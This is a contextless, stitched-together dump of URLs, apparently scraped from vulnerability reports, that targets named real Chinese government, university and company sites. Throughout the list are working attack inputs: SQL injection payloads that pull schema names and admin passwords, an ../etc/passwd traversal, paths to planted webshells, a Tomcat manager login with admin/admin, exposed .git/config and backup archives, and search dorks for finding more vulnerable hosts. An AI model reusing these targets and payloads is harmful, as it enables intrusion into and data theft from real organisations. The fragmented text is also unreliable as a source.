http://222.135.109.70:8200/WebDefault.aspx?CountryName=%e6%96%87%e7%99%bb%e5%b8%82&level=1 http://221.2.149.47:8200/WebDefault.aspx?CountryName=%e8%8d%ab%e5%ad%90%e9%95%87&level=2 http://111.17.169.213:801/WebDefault.aspx?CountryName=%e5%bc%a0%e5%ba%97%e5%8c%ba&level=0 http://jwh.tanljgzx.gov.cn/WebDefault.aspx?CountryName=%e6%b3%b0%e5%ae%89%e5%b8%82&level=0 http://61.133.119.187:8091/WebDefault.aspx?CountryName=%e9%ab%98%e6%8a%80%e5%8c%ba&level=1 http://218.56.99.84:8003/WebDefault.aspx?CountryName=%e6%98%86%e4%bb%91%e9%95%87&level=2 http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46’ http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 http://sso1.nlc.gov.cn/ReadPortal/rdRegisterF.jsp http://www.aqgjj.cn/jj_show.asp?id=286 cn:8735 http://hi.liebao.cn:8735 http://updatecenter.qq.com/queryselfupdate url:http://124.227.14.248:8081/manager/html user:admin http://124.227.14.248:8081/JDMP/ user:admin pass:admin http://laser.tju.edu.cn/phpmyadmin/ http://www.china-crc.com.cn/index.php/news/detail/pid/03/articleid/431 http://www.china-crc.com.cn/index.php/news/detail/pid/03/articleid/431%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20information_schema.SCHEMATA http://www.china-crc.com.cn/index.php/news/detail/pid/03/articleid/428%20and%201=2%20union%20select%201,2,3,4,5,SCHEMA_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20information_schema.SCHEMATA%20limit%201,1-- http://www.china-crc.com.cn/web.zip http://119.188.6.230:8080/dl/download.doc存在struts2漏洞 site:cup.edu.cn filetype:xls http://menhu.cup.edu.cn/puservice/task.s?action=download&userId=xxx http://menhu.cup.edu.cn/sso/index!loadType.action?username=xxx http://menhu.cup.edu.cn/puservice/task.s?action=findUserDetailsInfo&ICMS_SSO_USER_TOKEN=xxx http://menhu.cup.edu.cn/sso/index!load.action?appCode=ICMS http://www.cup.edu.cn http://oa.cup.edu.cn/ http://202.204.193.215/Zxmhlogin.jsp http://localhost:8080/rams/index.jsp http://gmis.cup.edu.cn/pyxx/logindd.aspx http://gmis.cup.edu.cn/gmis/logindd.aspx http://202.204.201.35:8088/business/login.do http://menhu.cup.edu.cn/sso/consSite/consSite.html http://card.cup.edu.cn/sydxPortalHome.action http://menhu.cup.edu.cn/sso/consSite/consSite.html http://oa.cup.edu.cn/seeyon/login/sso?from=sydxOneWebSit http://webservice.cup.edu.cn/network/query/LoginCheck2.aspx http://menhu.cup.edu.cn/puservice/task.s?action=saveUserInfo&userId= http://www.chinacer.com/showDepDirInfos.jsp?depcode=BR0000 http://gk.tjjh.gov.cn/showDepDirInfos.jsp?depcode=BR0000 http://zwgk.tjhd.gov.cn:8000/showDepDirInfos.jsp?depcode=BB0000 http://xinxigk.baodi.gov.cn/showDepDirInfos.jsp?depcode=BNA16G http://218.69.106.201:8080/showDepDirInfos.jsp?depcode=BCA09C http://xxgk.tjbc.cn/showDepDirInfos1.jsp?levelCode=0101&depcode=BLA01A http://www.tjzfxxgk.gov.cn/tjep/XWFBInfordetail.jsp?id=96 http://gk.tjjh.gov.cn/XWFBInfordetail.jsp?id=30 shell:http://rcgzb.hbu.edu.cn/upfile/talentsImg/tq.asp;.jpg http://cg.mycgw.com/common/login.action http://cg.mycgw.com/wooyun.jsp http://gtms02.alicdn.com/tps/i2/TB1fW2PGVXXXXX1XpXXUAkPJpXX-90-90.png http://zxxx.zjwchc.com:8080/zxxx/index.action http://wiki.pigai.org/ http://211.155.226.20:8080/socket5_davinci;chmod http://youqian.baidu.com/user/appeal/appeal_info?active=appeal_list&appeal_id=EC1178188d http://pianke.me/message/history/711309 http://www.loca.hk/enproduct.php?id=13 http://www.loca.hk/admin/adminindex.php http://www.lxzjc.gov.cn/jubao/ruleshow.asp?id=1 http://www.qjetc.gov.cn:88/sfwt/visitshow.asp?id=12 http://www.czdxyq.cn/jzxx/visitshow.asp?id=21 http://www.dfcms.net/ http://www.jkedu.net.cn:8080/webStationStats/webStationStats.do?method=stats&saasAppId=bdb5639f-c8ad-4b98-92fb-80cba5c7f567&webStationId=www_jkedu_net_cn http://www.dantu.gov.cn/webStationStats/webStationStats.do?method=stats&saasAppId=49aac47a-f659-42aa-ac57- http://www.jre.net.cn/webStationStats/webStationStats.do?method=stats&saasAppId=f463e6d9-c0c7-47a2-841d- http://www.dfcms.net:8080/webStationStats/webStationStats.do?method=stats&saasAppId=7defe4ae-dfb0-4901-87b7- http://rztsg.com/webStationStats/webStationStats.do?method=stats&saasAppId=e8aec4c4-064d-4b4c-af9d-a6018a2cf035&webStationId=www_rztsg_com http://www.zslxx.cn/webStationStats/webStationStats.do?method=stats&saasAppId=a42bb76e-afff-4bba-ad3c- http://218.3.133.26/webStationStats/webStationStats.do?method=stats&saasAppId=8fd048c0-473c-410b-9641- http://222.186.119.241/webStationStats/webStationStats.do?method=stats&saasAppId=1044b6f7-8a6a-4f9b-9d88-74c59c9c691f&webStationId=www_dantu_gov_cn http://www.jszjsx.com/webStationStats/webStationStats.do?method=stats&saasAppId=d30101e0-22a1-4c3e-9f57- http://www.dantu.gov.cn/webStationStats/webStationStats.do?method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStationId=hrss_dantu_gov_cn http://ichuguo.chinadaily.com.cn/search?query=%E8%BF%AA%E6%8B%9C&area=100 http://mtodo.wanda.cn/ServiceMobile.asmx?op=GetAllCount http://gxxmsb.cq.gov.cn/Admin/index.php/Public/view/id/8 http://admin.96020228.cn/ intitle:ZDSOFT.NET信息发布平台 http://www.kingosoft.com/cgal/mxyh.aspx http://stu.gxufe.cn/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://stu.gxufe.cn/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://szxy.cqsxedu.com/xsweb/_data/NEWS.aspx?href=633409086902360000.xml http://stu.gxufe.cn/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://221.215.217.106/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://xsgl.qjnu.edu.cn/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://1.85.45.94:800/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://szxy.cqsxedu.com/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun inurl:5clib/?.action http://jyjdc.pdsedu.gov.cn:9914/ http://www.baidu.com/s?wd=科发网上查询系统&ie=utf-8 http://cn.bing.com/search?q=科发网上查询系统&ie=utf-8 http://gzcx.tynu.edu.cn/kfweb/xyhzc.aspx http://221.5.51.228/cjb/xyhzc.aspx http://210.45.92.21/xyhzc.aspx http://www.shcdkf.com/kfweb/xyhzc.aspx http://cwc.sxufe.edu.cn/KfWeb/xyhzc.aspx http://www.cqvie.com/xfcxsq/xyhzc.aspx http://59.72.128.44/KfWeb/xyhzc.aspx http://gjgl.ahaas.cn/gjgl.aspx http://www.sklse.whu.edu.cn/index.php/admin/login biz.atsmart.com/biz/biz/login.action http://**.**.**/biz/wooyun.jsp http://**.**.**/Zdjdc_hlw/login.action http://**.**.**/Zdjdc_hlw/k8cmd.jsp http://training.fang.com//course/Course.aspx?action=search http://www.bank-of-tianjin.com.cn/websiteview/mapBranch/mapbranchlistCount.json http://www.bank-of-tianjin.com.cn/websiteview/mapBranch/mapbranchlistCount.json http://218.25.36.44:6789/cyry/login.action http://121.40.134.14/general/person_info/concern_user/update.php http://121.40.134.14 http://www.dca.org.cn/certification_anpai?fenlei=%E5%B7%A5%E4%BD%9C%E7%BB%84%E5%92%8C%E7%A0%94%E7%A9%B6&fid=227&id=183&wid=367%20union%20select%201,pwd,3,username,5,6,7,8,9,10,11,12%20from%20admin# http://www.dca.org.cn/admin http://www.dca.org.cn/search?like=1 http://**.**.**/platform/index.php/MainAction-getAdInfoByChannelIdchannelid=109&length=1&_=1418281553802 http://passport.comicyu.com/uploads/avatar_ori_170519_1418359830.gif/.php http://reg.kingdee.com/getpass.asp http://www.cnoocairproducts.com/list.asp?id=191 http://www.hihcar.com/Join/Handler.ashx?type=Shg&id=110000 http://studytv.cctv.com/activity/list?KeyWord=1% http://agent.pfp.sina.com.cn/login.html http://202.99.45.107:8080/login.action http://go.ly.com http://219.148.35.11 www.licaike.com http://img.dai.licaike.com/ http://servicehome.ufida.com.cn/kmview.aspx?postid=16503 http://www.bjunesco.gov.cn/ http://iche.zju.edu.cn/ckfinder/ckfinder.html http://120.197.95.200:9090/index.jsp http://www.apta.gov.cn:10080/informationContent.asp?news_id=123&type=F_News_RecentActivity http://www.letvcloud.com/api/docdownload/?filename=../../../../../../../../../../../etc/passwd http://**.**.**/index.aspx http://www.letvcloud.com/www.tar.gz http://www.smg.cn/ann/content.php?id=630 http://edm.feng.com/ http://edm.feng.com/aaa.txt file:TailList.sys http://www.blogjava.net/ebecket/articles/301493.html https://121.207.242.49/login http://www.cxdrc.com/person/viewmail.asp?id=14018 http://job0514.com/person/viewmail.asp?id=3338 http://www.dlcxdrc.com/person/viewmail.asp?id=14018 http://www.qzjyrczx.com/person/viewmail.asp?id=379 http://www.lnbprsrc.com/person/viewmail.asp?id=15585 http://zone.it.sohu.com/admin/ http://zone.it.sohu.com/admin.php http://club.sohu.com/fckeditor/ http://club.sohu.com/fckeditor/editor/filemanager/upload/php/upload.php http://club.sohu.com/userfiles/Media/fuck.pHp http://astro.women.sohu.com/server-status/ https://fuwu.alipay.com/platform/material.htm https://tfsimg.alipay.com/images/partner/T1PuXeXniLXXbMsGbX.html url:http://sxxwwybm.tyut.edu.cn/news.action http://feedback.uc.cn/feedback/feedback/feedbackdetail?instance=ClientiPad&Id=15386&rver=$rver&uc_param_str=einibicppfmivesifrutlasv http://feedback.uc.cn/feedback/feedback/deletefeedback?instance=ClientiPad&id=15381&rver=$rver&uid=43246025&uc_param_str=einibicppfmivesifrutlasv http://117.79.131.43:8080/ inurl:way/show.asp?id= http://www.ocanadatravel.com/way/show.asp?id=141 http://www.gdyy-travel.com/way/show.asp?id=125 http://www.wo-long-gang.com/way/show.asp?id=2 http://www.nanjingdongdu.com/way/show.asp?id=97 http://www.hs128.com/hs128/way/show.asp?id=44 http://www.zgszkh.com/way/show.asp?id=2392 http://www.83108310.com/way/show.asp?id=290 http://www.xz66.cn/way/show.asp?id=377 http://minibustour.cn/way/show.asp?id=115 http://www.youlv.com/way/show.asp?id=95 http://www.ocanadatravel.com/way/show.asp?id=141 http://www.gdyy-travel.com/way/show.asp?id=125 http://www.wo-long-gang.com/way/show.asp?id=2 http://localhost/blog/admin/store.php?action=insplu&source=/plugin/download/188 http://www.kingosoft.com/cgal/mxyh.aspx http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://221.215.217.106/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://xsgl.qjnu.edu.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://1.85.45.94:800/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://szxy.cqsxedu.com/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://175.19.208.78/query/PersonalBaseInfo!Login.jspx http://ltssfl.com/LTDefault.aspx http://www.x-lab.tsinghua.edu.cn/index.php?c=activity&a=top&e=hdjs&id=115+AND+1=1 http://125.64.220.176/test.txt http://125.64.220.176/eis/index.action inurl:ecdomain http://my.henau.edu.cn/userAttributesView.portal?userId=XX来判断该账号是否合法) http://xg.henau.edu.cn/epstar/login/index.jsp http://xg.henau.edu.cn/epstar/web/apps/reportJsp/showReport.jsp?raq=SWMS/JBXXXQ.raq&WID=XXXX http://my.henau.edu.cn/index.portal http://my.henau.edu.cn/authorizeUsers.portal?limit=20 http://xg.henau.edu.cn/epstar/web/apps/reportJsp/showReport.jsp?raq=SWMS/JBXXXQ.raq&WID=XXX http://u9service.yonyou.com/servicehome/kmview.aspx?postid=ZS20100530204 http://sqlmap.org http://academy.yonyou.com/ViewZsMap.aspx?der=zproducts&name=N http://dingdean.vicp.net:81/%E4%BA%A7%E5%93%81%E8%B5%84%E6%96%99/ http://careers.microsoft.com/web.zip http://223.202.5.5/ http://graschool.bjmu.edu.cn/EmploymentWeb/zxdt.aspx?id=982 http://www.bzcin.gov.cn/ClassInfo.asp?PrdID=12&ClassID=175&ClassName=%E8%A1%8C http://www.bzcin.gov.cn/ScanWebshell.asp http://223.202.1.75:8080/www.dyk-club.com.cn.zip http://223.202.1.75:8080/dealers-ad.dyk.com.cn.zip http://223.202.1.75:8080/Dealers-Reg.Dyk.Com.Cn.zip ftp://www.zyyzgl.cn/ http://**.**.**/qghk_content.aspID=13 http://e.kesion.com/exam/Reviews.aspx?id=20http://e.kesion.com/ http://e.kesion.com/exam/Reviews.aspx?id=20 http://e.kesion.com/exam/Reviews.aspx?id=16 http://e.kesion.com/exam/Reviews.aspx?id=19 http://www.et315.com/Default.aspx http://15.qq.com/ http://15.qq.com/.git/config ssh://wangpeng@115.159.72.104:13345/mydata/gitserver/15qq http://www.wayboo.cn/ http://hszyzc.com/subweb.php?class=96 http://www.xayichi.com/subweb.php?class=37 http://www.dfhlgl.com/subweb.php?class=18 http://www.shfuhai.com/subweb.php?class=26 http://www.hqdsvf.com/subweb.php?class=79 http://www.xayfds.net/subweb.php?class=64 http://www.bjyalian.net/subweb.php?class=14 http://www.bjznxf.com/subweb.php?class=6 http://www.xawhmc.com/subweb.php?class=40 http://www.pbdt360.com/subweb.php?class=13 http://www.sxtongtu.com/subweb.php?class=31 http://www.bdjyjx.com/subweb.php?class=36 http://www.jndsmm.com/subweb.php?class=22 http://www.qiqiangjx.com/subweb.php?class=5 http://www.lhzpl.com/subweb.php?class=59 http://www.sjzbangongjiaju.com/subweb.php?class=36 http://www.月子病.net/subweb.php?class=31 http://www.fangshuilaoguo.com/subweb.php?class=25 http://www.hszs555.com/subweb.php?class=25 http://www.hbdxps.com//subweb.php?class=25 http://www.caciquemill.net/subweb.php?class=25 http://www.caciquemill.net/subweb.php?class=25 http://www.hbdxps.com//subweb.php?class=25 http://investor.skyworth.com/html/ir_circular.php?year=2014 http://www.rcwl.net/ http://rcwl.net/demo/News/Message/?typeId=mess04 http://www.wxlxas.com/News/Message/?typeId=mess04 http://www.stxx.fxedu.cn/News/Message/?typeId=mess04 http://www.cqjjzx.com/webschool/News/Message/?typeId=mess04 http://www.cqxjwxx.com.cn/webschool/News/Message/?typeId=mess04 http://mhzx.mhedu.sh.cn/mhzx/News/Message/?typeId=mess04 http://www.jycsyey.net/webschool/News/Message/?typeId=mess03 http://www.czxqxx.cn/webschool/News/Message/?typeId=mess01 http://223.4.203.193/cqjyxh/News/Message/?typeId=mess02 http://222.191.250.164/webschool/News/Message/?typeId=mess02 http://czcjxx.com.cn/webschool/News/Message/?typeId=mess01 http://czcjxx.com.cn/webschool/News/Message/?typeId=mess01 http://www.wayboo.cn/ http://www.jndsmm.com/news_list.php?class=2 http://www.pbdt360.com/news_list.php?class=2 http://chengxinbaipisong.com/news_list.php?class=2 http://www.xawhmc.com/news_list.php?class=41 http://www.hqdsvf.com/news_list.php?class=2 http://sjzbangongjiaju.com/news_list.php?class=2 http://www.lhzpl.com/news_list.php?class=2 http://www.jljddb.com/news_list.php?class=2 http://www.bhpfjkjy.com/news_list.php?class=37 http://www.365scl.com/news_list.php?class=31 http://hrgg88.com/news_list.php?class=2 http://www.bszyjc.net/news_list.php?class=2 http://www.sxtongtu.com/news_list.php?class=41 http://www.lilongeps.cn/news_list.php?class=2 http://www.诚田暖气.com/news_list.php?class=58 http://w308810.s70-187.myverydz.com/news_list.php?class=2 http://www.fangshuilaoguo.com/news_list.php?class=2 http://www.xyxf119.com/news_list.php?class=2 http://www.xaqiegeji.com/news_list.php?class=41 http://bdjunlong.com/news_list.php?class=2 http://www.huashidaijiaoyu.com/news_list.php?class=118 http://www.huashidaijiaoyu.com/news_list.php?class=118 http://bdjunlong.com/news_list.php?class=2 http://www.wayboo.cn/ http://www.xayfds.net/pics_list.php?class=47 http://www.xayichi.com/pics_list.php?class=3 http://www.shfuhai.com/pics_list.php?class=39 http://www.xawhmc.com/pics_list.php?class=55 http://www.jndsmm.com/pics_list.php?class=36 http://www.pbdt360.com/pics_list.php?class=71 http://www.xakqby.com/pics_list.php?class=43 http://www.bdjyjx.com/pics_list.php?class=3 http://www.xakqby.com/pics_list.php?class=36 http://www.bjznxf.com/pics_list.php?class=41 http://www.lhzpl.com/pics_list.php?class=34 http://www.sxtongtu.com/pics_list.php?class=39 http://www.tianchuanfood.com/pics_list.php?class=68 http://sjzbangongjiaju.com/pics_list.php?class=36 http://www.chengtiannuanqi.com/pics_list.php?class=3 http://www.qiqiangjx.com/pics_list.php?class=3 http://chengxinbaipisong.com/pics_list.php?class=36 http://www.bhpfjkjy.com/pics_list.php?class=3 http://hrgg88.com/pics_list.php?class=3 http://www.365scl.com/pics_list.php?class=71 http://chengkai888.com/pics_list.php?class=65 http://www.zzpjjg.com/pics_list.php?class=49 http://qcsiwang.com/pics_list.php?class=4 http://bdjunlong.com/pics_list.php?class=3 http://www.jljddb.com/pics_list.php?class=4 http://www.bjyalian.net/pics_list.php?class=3 http://www.bszyjc.net/pics_list.php?class=4 http://www.bdbaihuajiaoyu.com/pics_list.php?class=69 http://www.xaqiegeji.com/pics_list.php?class=39 http://www.caciquemill.net/pics_list.php?class=3 http://www.hbdxps.com/pics_list.php?class=4 http://www.hszs555.com/pics_list.php?class=43 http://www.fangshuilaoguo.com/pics_list.php?class=64 http://www.fangshuilaoguo.com/pics_list.php?class=64 http://www.hszs555.com/pics_list.php?class=43 http://mp.toutiao.com/login/ http://mp.toutiao.com/activate_user_email_action/?email_id=3732817410&ticket=TNHKT1 http://118.186.207.58/login.php http://m.wanhui.cn/ktv/ktvdetail/?cid=e7dd34fe-84c2-4813-a334-38cc0c5663ef http://p3p.sogou.com/upgrademanual.php?h=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&v=5.1.7.15323&r=0000 http://www4.zzu.edu.cn/webnet/xuan/list.aspx?bt=aggqdjc http://www.wmw.cn/ http://passport.wmw.cn/passport/newloginiframe.action http://apps.zsepb.gov.cn/zsapt/login.action http://adp.whoclick.cn/ADPush/pushfacade!amdsr.action?callback=haiqipopMySucc&amdsrdata={%22requesttype%22:%22AMDSR%22,%22publisherid%22:%2234110%22,%22screenwidth%22:%221920%22,%22screenheight%22:%221080%22,%22ip%22:%22119.57.154.74%22,%22keyword%22:%22%22,%22sourceurl%22:%22%22,%22targeturl%22:%22http%3A%2F%2Fwww.timeyb.com%2F%22}?1418178180012 http://pic.gmw.cn/ http://www.t1networks.com/web.rar http://sh.live800.com/admin/top.aspx http://lib.zzu.edu.cn/say.aspx?sid=493b9edc-3388-4baf-a5c1-d42e6fdf7462 http://rsks.gov.cn/ http://www.westfood.com.cn/zpqz/printqzinfo.action http://www.westfood.com.cn/1.jsp http://114.255.121.12:8001/app/user/login.php http://live.findlaw.cn/iframe/flink.php?luanmu=falvchangshi&channel=64 http://live.findlaw.cn/iframe/ht_flink.php?fid=69 http://china.findlaw.cn/product/index.php?m=Zhishi&a=zt_ajax&catid=7852 http://china.findlaw.cn/aboutus/tougao.php http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp http://cwc.sxufe.edu.cn/KfWeb/admin/StudentPassword.aspx http://www.shcdkf.com/kfweb/admin/StudentPassword.aspx http://221.5.51.228/cjb/admin/StudentPassword.aspx http://61.142.174.200/cwc/KFweb/admin/StudentPassword.aspx http://cwch.ahu.edu.cn/querynetweb/admin/StudentPassword.aspx http://www.cqvie.com/xfcxsq/admin/StudentPassword.aspx http://59.72.128.44/KfWeb/admin/StudentPassword.aspx http://cwch.ahu.edu.cn/querynetweb/admin/StudentPassword.aspx http://cycwc.gzife.edu.cn/kefa/admin/StudentPassword.aspx http://www.liangjing.org/qiyejianzhan/Ch/ProductClass-2.html inurl:Chinese/ProductShow.asp?ArticleID= http://www.shzxyy.com/chinese/FaqInfo.asp?ID=76 http://www.joinluck.com/Chinese/FaqInfo.asp?id=74 http://www.z-hope.com/Chinese/FaqInfo.asp?id=76 http://www.wmt.com.cn/chinese/FaqInfo.asp?id=76 http://www.autochair.cn/au/Chinese/FaqInfo.asp?id=76 http://www.fjjyarts.com/chinese/FaqInfo.asp?id=86 http://guard.net.cn/cn/index/FaqInfo.asp?id=268 http://www.fishmedicine.com.cn/Chinese/FaqInfo.asp?id=89 http://www.newcam-olym.com/Chinese/FaqInfo.asp?id=106 http://www.cdsysoft.cn/Chinese/FaqInfo.asp?id=3 http://www.wuzhouyiyao.com/Chinese/FaqInfo.asp?id=2 http://www.zhonglifurniture.com/Chinese/FaqInfo.asp?id=76 http://www.lrdyf.com/chinese/FaqInfo.asp?id=73 http://www.kchzhz.com/chinese/FaqInfo.asp?id=76 http://www.99smsoft.com/Chinese/FaqInfo.asp?id=2 http://www.xxctmy.com/chinese/FaqInfo.asp?id=88 http://www.zh-rx.com/zhrx/Chinese/FaqInfo.asp?id=73 http://www.xinjihai.com/Chinese/FaqInfo.asp?id=81 http://www.hngfz.com/Chinese/FaqInfo.asp?id=78 http://www.zqtm.cn/service/faqInfo.asp?id=4 http://www.ennanna.com/chinese/FaqInfo.asp?id=80 http://www.jllgs.com/chinese/FaqInfo.asp?id=76 http://www.sh-q.com.cn/Chinese/FaqInfo.asp?id=73 http://www.jmjjgc.com/chinese/FaqInfo.asp?id=89 http://www.scxoy.com/Chinese/FaqInfo.asp?id=73 http://www.cscl.cn/Chinese/FaqInfo.asp?id=73 http://www.pinganxiaofang.cn/Chinese/FaqInfo.asp?id=15 http://www.lopo.com.cn/chinese/FaqInfo.asp?id=74 http://www.leige.com.cn/English/En_ProductShow.asp?ArticleID=601 http://www.zhongjinalu.com/English/En_ProductShow.asp?ArticleID=314 http://www.yike.com.cn/English/en_ProductShow.asp?ArticleID=878 http://www.cuiquan.com/English/En_ProductShow.asp?ArticleID=180 http://www.joinluck.com//English/En_ProductShow.asp?ArticleID=149 http://www.hengtongchemical.com/english/En_ProductShow.asp?ArticleID=11 http://www.fumingwei.com/English/En_ProductShow.asp?ArticleID=24 http://www.watsin.com.cn/English/En_ProductShow.asp?ArticleID=169 http://www.yunntong.com/english/En_ProductShow.asp?ArticleID=25 http://www.taishantyre.com/English/En_ProductShow.asp?ArticleID=132 http://www.mme.com.cn/English/En_ProductShow.asp?ArticleID=287 http://www.totemamusement.com/English/En_ProductShow.asp?ArticleID=432 http://www.z-hope.com/English/En_ProductShow.asp?ArticleID=152 http://www.wishfuloptical.com/English/En_ProductShow.asp?ArticleID=219 http://www.jingliangroup.com/english/En_ProductShow.asp?ArticleID=138 http://www.pandaintl.com.cn/en/En_ProductShow.asp?ArticleID=579 http://www.medicn.cn/english/En_ProductShow.asp?ArticleID=281 http://www.hanbo.cc/udisk/english/En_ProductShow.asp?ArticleID=1140 http://www.zhihefrp.com/English/En_ProductShow.asp?ArticleID=143 http://www.scrfast.com/English/En_ProductShow.asp?ArticleID=319 http://www.ldfibre.cn/English/En_ProductShow.asp?ArticleID=171 http://www.binzim.net/English/En_ProductShow.asp?ArticleID=607 http://www.kalifon.com/en/En_ProductShow.asp?ArticleID=140 http://www.zhmachinery.com/En/En_ProductShow.asp?ArticleID=174 http://www.zhongjinalu.com/English/En_Product.asp?EnBigClassName=Smoke%20foil http://www.yike.com.cn/English/En_Product.asp?EnBigClassName=Stand%20Series http://www.joinluck.com//English/En_Product.asp?EnBigClassName=LED-Based%20Products http://www.hengtongchemical.com/english/En_Product.asp?EnBigClassName=hg http://www.yunntong.com/english/En_Product.asp?EnBigClassName=Anti-decubitus\Pump http://www.watsin.com.cn/English/En_Product.asp?EnBigClassName=GeneTime http://www.fumingwei.com/English/En_Product.asp?EnBigClassName=For%20Medical http://www.taishantyre.com/English/En_Product.asp?EnBigClassName=CAR%20TYRE%20SERIES http://www.mme.com.cn/English/En_Product.asp?EnBigClassName=mobile%20series http://www.totemamusement.com/English/En_Product.asp?EnBigClassName=PRODUCTS http://www.z-hope.com/English/En_Product.asp?EnBigClassName=cable%20recovery%20equipment http://www.wishfuloptical.com/English/En_Product.asp?EnBigClassName=CR39%20Resin%20Lens http://www.jingliangroup.com/english/En_Product.asp?EnBigClassName=Lens%20edger http://www.pandaintl.com.cn/en/En_Product.asp?EnBigClassName=LCD%20Panel http://www.medicn.cn/English/En_Product.asp?EnBigClassName=Intermediates/Chemicals http://www.hanbo.cc/udisk/english/En_Product.asp?EnBigClassName=USB%20FLASH%20DRIVES http://www.zhihefrp.com/English/En_Product.asp?EnBigClassName=National%20defense http://www.scrfast.com/English/En_Product.asp?EnBigClassName=WASHERS http://www.binzim.net/English/En_Product.asp?BigClassName=Ultrasonic%20Beauty%20Instrument http://www.kalifon.com/en/En_Product.asp?EnBigClassName=New%20products http://www.zhmachinery.com/En/En_Product.asp?EnBigClassName=Laundry%20Soap%20Machine http://www.lxjx.cn/ajax.php?act=cate&id=1 http://www.liangjing.org/qiyejianzhan/Ch/ProductClass-2.html inurl:Chinese/ProductShow.asp?ArticleID= http://admin.asp99.cn/2008/Chinese/index.asp由于有WAF所以不能直接工具注入,我就不用demo演示了 http://www.leige.com.cn/Chinese/ProductShow.asp?ArticleID=601 http://218.4.48.253/Chinese/ProductShow.asp?ArticleID=192 http://www.ccm-hardware.com/chinese/ProductShow.asp?ArticleID=159 http://www.yike.com.cn/chinese/ProductShow.asp?ArticleID=878 http://www.hengtongchemical.com/chinese/ProductShow.asp?ArticleID=12 http://www.ssllt.com/llt/Chinese/ProductShow.asp?ArticleID=190 http://www.jllgs.com/chinese/ProductShow.asp?ArticleID=188 http://www.joinluck.com/Chinese/ProductShow.asp?ArticleID=151 http://www.jsdydj.cn/Chinese/ProductShow.asp?ArticleID=173 http://www.sh-q.com.cn/Chinese/ProductShow.asp?ArticleID=193 http://www.ruidongyb.com/Chinese/ProductShow.asp?ArticleID=138 http://www.99smsoft.com/Chinese/ProductShow.asp?ArticleID=176 http://www.wmt.com.cn/chinese/ProductShow.asp?ArticleID=274 http://www.mhtsoft.com/Chinese/ProductShow.asp?ArticleID=204 http://www.wuzhouyiyao.com/Chinese/ProductShow.asp?ArticleID=188 http://www.csf.net.cn/2008/chinese/ProductShow.asp?ArticleID=223 http://www.cdsysoft.cn/Chinese/ProductShow.asp?ArticleID=175 http://www.high-hot.cn/Chinese/ProductShow.asp?ArticleID=158 http://www.bjztxy.com/Chinese/ProductShow.asp?ArticleID=144 http://www.tzymjx.com/chinese/ProductShow.asp?ArticleID=255 http://www.pabx.cn/chinese/ProductShow.asp?ArticleID=165 http://jsxf.com.cn/Chinese/ProductShow.asp?ArticleID=196 http://www.tgbjs.com/Chinese/ProductShow.asp?ArticleID=140 http://www.zhmachinery.com/Chinese/ProductShow.asp?ArticleID=178 http://www.goldcode.cn/chinese/ProductShow.asp?ArticleID=370 http://www.ccm-hardware.com/chinese/Product.asp?BigClassName=%B9%A4%BE%DF%BF%DB http://www.leige.com.cn/Chinese/Product.asp?BigClassName=%B8%F4%D2%F4%B2%C4%C1%CF http://www.yike.com.cn/chinese/Product.asp?BigClassName=%D6%A7%BC%DC%CF%B5%C1%D0 http://www.hengtongchemical.com/chinese/Product.asp?BigClassName=%BB%AF%B9%A4%B2%FA%C6%B7 http://www.jllgs.com/chinese/Product.asp?BigClassName=%B8%D6%CB%BF%C9%FE%CF%B5%C1%D0 http://www.joinluck.com/Chinese/Product.asp?BigClassName=LED%D3%A6%D3%C3%B2%FA%C6%B7 http://www.jsdydj.cn/Chinese/Product.asp?BigClassName=%D6%B1%C1%F7%B5%E7%BB%FA http://www.ssllt.com/llt/Chinese/Product.asp?BigClassName=%C6%FB%B3%B5%D3%B0%D2%F4%D3%C3%C6%B7 http://www.sh-q.com.cn/Chinese/Product.asp?BigClassName=CAD%20%BC%C6%CB%E3%BB%FA%B8%A8%D6%FA%C9%E8%BC%C6 http://www.ruidongyb.com/Chinese/Product.asp?BigClassName=%D1%B9%C1%A6%B1%ED%BB%FA%D0%BE http://www.99smsoft.com/Chinese/Product.asp?BigClassName=%D7%DB%BA%CF%C8%ED%BC%FE%CF%B5%C1%D0 http://www.wmt.com.cn/chinese/Product.asp?BigClassName=%B8%DC%B8%CB%D6%B8%CA%BE%B1%ED http://www.wuzhouyiyao.com/Chinese/Product.asp?BigClassName=%C8%AB%B9%FA%D5%D0%C9%CC%C6%B7%D6%D6 http://www.mhtsoft.com/Chinese/Product.asp?BigClassName=%D0%DD%CF%D0/%B2%CD%D2%FB http://www.csf.net.cn/2008/chinese/Product.asp?BigClassName=%CA%E0%D6%E1 http://www.cdsysoft.cn/Chinese/Product.asp?BigClassName=%B0%F1%C9%CF%CB%E3%C3%FC%CF%B5%C1%D0 http://www.bjztxy.com/Chinese/Product.asp?BigClassName=%B9%AB%CB%BE%B2%FA%C6%B7 http://www.tzymjx.com/chinese/Product.asp?BigClassName=%C8%AB%D7%D4%B6%AF%B4%B5%C6%BF%BB%FA 